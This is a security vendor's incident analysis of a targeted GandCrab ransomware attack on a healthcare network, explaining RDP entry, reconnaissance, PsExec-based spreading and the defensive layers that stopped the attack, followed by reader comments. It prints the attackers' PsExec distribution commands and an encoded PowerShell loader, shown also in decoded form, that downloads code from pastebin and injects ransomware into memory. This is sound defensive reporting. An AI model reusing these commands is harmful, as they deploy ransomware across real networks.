Thanks to Sophos experts Vikas Singh and Peter Mackenzie for the research in this article.
Just before 9pm on Sunday, 3 February 2019, a GandCrab executable sparked into life for an instant, before its brief existence was snuffed out by antivirus software. Stopped in its tracks, the malware triggered the first of what would quickly become hundreds of separate alerts for a US healthcare provider in the grip of a targeted ransomware attack.
The organisation’s network of about 500 computers found itself fending off two attacks involving GandCrab ransomware. Because some of the computers on the network weren’t protected by antivirus, the attack provides an unusually colourful illustration of both how a targeted ransomware attack happens, and how different layers of protection interact in defence.
This is how the attack unfolded and how you can stop it happening to you.
Approach
Ransomware is malware that encrypts the contents of a computer and then demands a ransom in return for decrypting it. Ransomware is normally distributed in large scale, untargeted attacks that use malicious websites or email attachments to infect as many victims as possible. Victims are typically asked to pay a few hundred dollars’ worth of Bitcoin to free themselves from the ransomware’s grip.
One of the most popular kinds of ransomware used in these campaigns is GandCrab. Its creators peddle it to anyone who wants to use it using the Ransomware-as-a-Service model, which nets them a percentage of each ransom it extorts. GandCrab users choose the ransom they want to demand, which is typically somewhere from a few hundred to a few thousand dollars per computer.
But in the last couple of years, a new template for ransomware attacks has emerged.
Some criminals are turning away from “fire and forget” distribution in favour of highly focused, guided attacks, generally referred to as targeted attacks.
In a targeted attack the ransomware operators choose a victim, break into their network and deploy their ransomware to maximum effect. Typically that means targeting an organisation’s servers, although occasionally, as in this case, an attacker will simply target as many computers as possible.
Delivering the malware to its destination by hand allows hackers to adapt: they can perform reconnaissance, carry out their work using standard system administration tools, learn from their mistakes, respond to defences and, if they aren’t removed from the network, they can persist until they find an approach that works.
The effect of this approach is to turn entire organisations into victims rather than simply individual users, and the pay-off for the extra effort involved in performing this kind of attack is often huge five or six figure ransoms.
Targeted ransomware attacks have typically been associated with particular strains of specialised malware, like BitPaymer, SamSam or Ryuk. RaaS like GandCrab allows crooks with less technical ability to get in on the act without needing to create their own ransomware, command and control infrastructure or payment handling.
Ingress
Modern targeted attacks almost always begin with an attacker entering a victim’s network by brute-forcing the credentials of a computer with RDP (Remote Desktop Protocol) enabled. That appears to be how the hackers entered here. Despite the organisation’s attempts to limit RDP access to specific IP ranges and third parties, computers with open RDP ports were visible in the Shodan search engine results where attackers often look for victims.
Stronger passwords or two-factor authentication would likely have stopped the attack, while disabling RDP or limiting it to users on the company VPN (Virtual Private Network) would have removed the organisation from the attacker’s shortlist of targets entirely.
The attackers either succeeded in guessing an administrator password from outside the network, or acquired administrator access after breaking in.
Although they weren’t found in this attack, the same group has been linked to other attacks that relied on the RDP password cracking tool NLBrute, and Mimikatz, a tool that allows attackers to elevate their privileges after breaking in by extracting admin passwords from memory.
The attackers either entered via, or moved laterally to, a computer acting as a host for multiple virtual machines running services vital to the organisation. Critically, although much of the network was protected by Sophos Endpoint Protection, the organisation had chosen not to install it on this computer, which made it the perfect place for the attackers to hide, prepare and then launch their attack.
Reconnaissance
Hidden from view, the attackers unloaded their toolkit into the C:\PerfLogs\Apps
directory. They scanned the victim’s network using two tools – KPortScan3.exe
and NetworkShare.exe
– and compiled a list of the IP addresses they’d attempt to infect with GandCrab.
Had the server been running endpoint security software, it’s likely that both of these utilities would have triggered an alert and been blocked (the Sophos software running elsewhere on the network blocks them both as Potentially Unwanted Applications).
Alongside their reconnaissance tools, the crooks also readied a number of batch scripts and a copy of GandCrab 5.1 renamed Adobe Acrobat.exe
.
First wave
Having scanned the network, the attackers launch their attack using psexec EXE.bat
, a small batch script that uses the PsExec utility to copy GandCrab, under the name Adobe Acrobat.exe
, to each IP address in the file ip.txt
.
psexec @ip.txt -d -c "Adobe Acrobat.exe"
PsExec is part of Microsoft Sysinternals and Microsoft describes it as:
…a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.
System administrators use it to distribute and run software throughout a network, which makes it the perfect tool for hackers looking to spread ransomware. (For that reason, Sophos treats PsExec as a Potentially Unwanted Application and blocks it by default. Admins are free to unblock it but encouraged to do so selectively, for the smallest number of useful users.)
For convenience, it’s not unusual for admins to remove PsExec from the list of PUAs entirely, and that’s what the administrators on the victim’s network had done here.
Had it remained on the list of PUAs, an alert would have been triggered and the attacker would have been unable to copy the malware from the unprotected machine onto its targets.
The GandCrab executables had been modified to avoid static, signature-based detection but were detected by behavioural monitoring as soon as they began to run. (Sophos’s behavioural monitoring blocked them as HPmal/GandKrb-A, and static detection has since been added to Troj/Gandcra-AH.)
Behavioural monitoring had been turned off on some servers, and on those computers the executables were stopped by Intercept X‘s CryptoGuard, which detected the malware’s attempts to encrypt files.
The same anti-encryption defence also stepped in to protect data on computers that shared network drives with unprotected systems. The malware executables lurking in the memory of unprotected computers were hidden from security software, but when they tried to encrypt files on drives shared by protected computers the encryption was stopped and the offending systems isolated.
Because some activity has to occur for both behavioural detection and anti-encryption countermeasures to fire, the malware was able to drop some ransom notes.
This gave the victim an opportunity to investigate how much ransom they would have been charged, and to dip their toe into the disconcertingly polished world of the GandCrab RaaS environment.
The ransom note directed the victim to a page on the GandCrab Dark Web site http://gandcrabmfe6mnef.onion/<unique code>
(note the unusual vanity domain) where they could identify themselves with a ransom note.
The demand? A staggering $18,750 per machine, doubling after six days. Far more than the typical ransom in a an untargated spam campaign.
Second wave
About ten minutes after the first wave of attacks ran aground, a second GandCrab attack using an interesting Reflective PE Injection technique began. It was launched by another batch script relying on PsExec, called psexec BAT.bat
which copied the backup.bat
script to all the computers listed in ip.txt
before invoking it.
psexec @ip.txt -d -c backup.bat
The backup.bat
script starts PowerShell and invokes some base64-encoded code.
cmd.exe /c START C:\Windows \system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNAEQANgA0ACcAKQB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAEUAbgB2ADoAVwBJAE4ARABJAFIAXABTAHkAcwBXAE8AVwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAIAAtAGEAcgBnAHUAbQBlAG4AdAAgACIASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBGADIAaQB5AFcAWQBLAFoAJwApACkAOwBJAG4AdgBvAGsAZQAtAEsASwBMAFQARwBIAE8AWgBBAEIAWABTAEsAVQBLAEwAQwBWAFQAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAMAAwADAAMAAwADsAIgB9AGUAbABzAGUAewAgAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ARgAyAGkAeQBXAFkASwBaACcAKQApADsASQBuAHYAbwBrAGUALQBLAEsATABUAEcASABPAFoAQQBCAFgAUwBLAFUASwBMAEMAVgBUADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAAwADAAMAA7ACAAfQA
The code invokes a webclient object which downloads code from a page on pastebin.com, and then calls the function Invoke-KKLTGHOZABXSKUKLCVT
in that code, with a delay of 1 million seconds (about 11.5 days).
If ($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64') { Start-Process -FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.@\powershell.exe" -argument "IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/F2iyWYKZ'));Invoke-KKLTGHOZABXSKUKLCVT;Start-Sleep -s 1000000;" } else { IEX(({new-object net.webclient).downloadstring('https://pastebin.com/raw/F2iyWYKZ'));Invoke-KKLTGHOZABXSKUKLCVT;Start-Sleep -s 1000000; }
The function scheduled to run in 1 million seconds’ time contains a full, base64 encoded copy of the GandCrab malware, which is loaded directly into memory by PowerShell. This technique is an attempt to dodge antivirus software by using a legitimate executable, PowerShell, and avoiding filesystem writes.
function Invoke-KKLTGHOZABXSKUKLCVT { $PEBytes32 = <base64 encoded GandCrab binary> [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32) Invoke-Inj -PEBytes $PEBytes }
It didn’t work – the paused copies of GandCrab in memory were caught by behavioural protection and identified as HPmal/Ransom-Z again. Static detection has since been added for backup.bat
, which is detected as Troj/BatDldr-Z.
Reflective PE Injection is a fileless malware technique that’s been around a while, but the earliest information we’ve found that shows GandCrab being invoked in this way, with a million second delay, was published in February 2018.
In that case the code was triggered by a Word Macro in a document downloaded by a PDF, delivered in a spam campaign. Sophos has since seen the code used in a small number of targeted ransomware attacks, beginning in December 2018.
The delay of 1 million seconds is curious. It makes sense that the attacker might try two different approaches since it increases their chances of success. But why not run them concurrently and reduce the time the victim has to respond?
We don’t know why the second wave was set to go off with such a delay, but we can speculate. If both waves of the attack had succeeded then the victim would have been struck twice, with two ransom demands, a little under two weeks apart. The hiatus between them is perhaps just long enough to allow the victim to pay the ransom and recover from the first attack, but not enough time to make significant changes to their computer administration.
What to do?
Defending against a determined, targeted attack demands defence in depth, and, as in many things, prevention is better than cure. That starts with ensuring that access to RDP is secure and finishes with regular, comprehensive, off-site backups, with much else in between.
To read more about those things and the preventive steps you can take to protect yourself against targeted ransomware of all stripes, read our article on how to defend against SamSam ransomware.
Visit sophos.com to read more about PUAs (Potentially Unwanted Applications), behavioural detection, CryptoGuard and other anti-ransomware technologies mentioned in this article.
Bryan
I’ll admit I was annoyed at seeing a few of the PUA designations, but even then I appreciate where it comes from.
This article puts a fine little exclamation mark on that comprehension…thanks.
Laurence Marks
The nuclear plant meltdown at Chernobyl occurred because administrators successively disabled each safeguard that tripped attempting to halt the dangerous “test.” Eventually there were no more safeguards. It was a recipe for disaster.
Administrators at “the US healthcare provider” must have been inspired by those at Chernobyl. As you tell it, they did everything they could to allow this attack to happen.
Anonymous
Good article – well articulated details on the behavior of GandCrab!!
RaaS a development that could prove a major headache for Security admins – increased vigil is the call++++++ so many other actions